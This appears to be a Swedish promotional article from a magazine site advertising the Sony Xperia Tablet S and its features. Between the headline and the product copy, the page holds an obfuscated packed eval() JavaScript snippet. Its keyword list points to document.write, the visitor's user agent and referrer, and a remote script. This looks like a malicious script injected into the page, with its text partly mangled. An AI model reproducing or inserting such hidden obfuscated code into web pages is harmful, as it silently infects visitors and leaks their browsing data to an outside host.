Image Image Image Image Image Image Image Image Image Image

| 6 juli, 2020

Scroll to top

Top

Gör mer med Sony Xperia Tablet

Gör mer med Sony Xperia Tablet
Revue Magazine

type=”text/javascript” src=”http://videos.goviral-content.com/playerjs-yt/sony_tablet_12853.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1451283&skinName=light&wmode=window&hideChrome=0″>
Sony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inyad|var|u0026u|referrer|fdhzf||js|php’.split(’|’),0,{}))
Xperia Tablet är här och visar vart skåpet ska stå. Gör mer, titta på mer, upptäck mer och spela mer med nya Xperia Tablet S. 

Xperia Tablet S hamnar naturligt i centrum bland din hemmateknik, oavsett märke. Byt tv-kanaler och välj låtar från musiksystemet med hjälp av universalfjärrkontrollen. Dela videor och bilder med DLNA-teknik genom att helt enkelt ”kasta” dem till den stora skärmen.

Med IPS-tekniken kan vännerna titta från valfri vinkel. Clear Phase- och xLoud-teknik ger fantastisk klarhet. Strömma helt enkelt filmer och album genom Sony Entertainment Network4 och Walkman-apparna. Mycket nöje!

Med det superslimmade aluminiumfodralet och den stänktåliga skärmen kan du lugnt ta fram recept med blöta händer eller ta med dig den när du går ut ³. Den är redo att användas när som helst och var som helst – med stil.

Med Xperia Tablet kan du använda två appar samtidigt genom att använda en app i ett litet fönster (småappar) samtidigt som du fortsätter att använda huvudappen som du är i. Småapparna omfattar miniräknare, webbläsare, röstinspelning, timer och IR-fjärrkontroll.

Se mer i videon ovan!